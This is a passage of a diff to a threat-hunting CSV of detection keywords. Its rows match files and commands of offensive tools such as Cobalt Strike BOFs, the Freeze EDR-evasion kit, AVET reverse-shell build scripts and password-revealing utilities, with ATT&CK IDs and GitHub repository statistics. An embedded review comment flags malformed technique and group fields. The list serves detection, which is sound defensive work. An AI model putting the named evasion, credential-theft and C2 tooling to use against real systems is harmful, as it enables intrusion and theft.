- T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*-Build $RandomAttackPath*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*build Freeze.go*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*build Freeze.go*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*build SourcePoint.go*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*build Supernova.go*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*build.ps1 -commands * -profile *selfcontained -singlefile*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*build.ps1 -profiles * -commands * -compressed*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*build Supernova.go*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*build.ps1 -commands * -profile *selfcontained -singlefile*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*build.ps1 -profiles * -commands * -compressed*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*build/breg.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*build_40xshikata_revhttpsunstaged_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*build_50xshikata_quiet_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" 
@@ -8053,20 +8200,20 @@ "*build_svc_20xshikata_bindtcp_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*BuildBOFs.exe*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*BuildBOFs.sln*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" -"*Building SYSTEM impersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Building SYSTEM impersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*BulletsPassView.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView.zip*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_setup.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_x64.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bully wlan1mon -b * -c 9 -S -F -B -v 3*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*bunny.deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*bupload_raw*.dll*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*burnett_top_1024.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bupload_raw*.dll*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*burnett_top_1024.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Burp Suite*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burp*PayloadParser.py*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" "*burp*SQLMapper.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" 
"*burp.extension-payloadparser*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" -"*burp_log_*.log*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burp_log_*.log*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*Burp_start.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*Burp_start_en.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp2malleable.*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" 
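Review bot: The rewritten `*burnett_top_1024.txt*` row still carries a malformed technique list, `T1204 -T1210`, where every other entry in that field is separated by ` - `; a consumer that splits on that separator would presumably get one unrecognised token instead of two ATT&CK IDs, so the field should read `T1204 - T1210`. The re-emitted `*Building SYSTEM impersonation*` row has similar residue: its groups field ends with a dangling separator (`Indrik Spider - Turla - `) and its technique list names `T1106` twice. Since this refresh rewrites these rows anyway for the star and fork counts, normalising the fields where the rows are produced would keep technique and group enrichment in downstream detections accurate. The same metasploit technique string recurs in the later hunk of this diff, for example on the `*byakugan/bin/*` row.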
@@ -8074,10 +8221,10 @@ "*BurpCO2Suite.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*burpcollaborator.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpFunctions.java*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" -"*burpitem.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*burplog.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" 
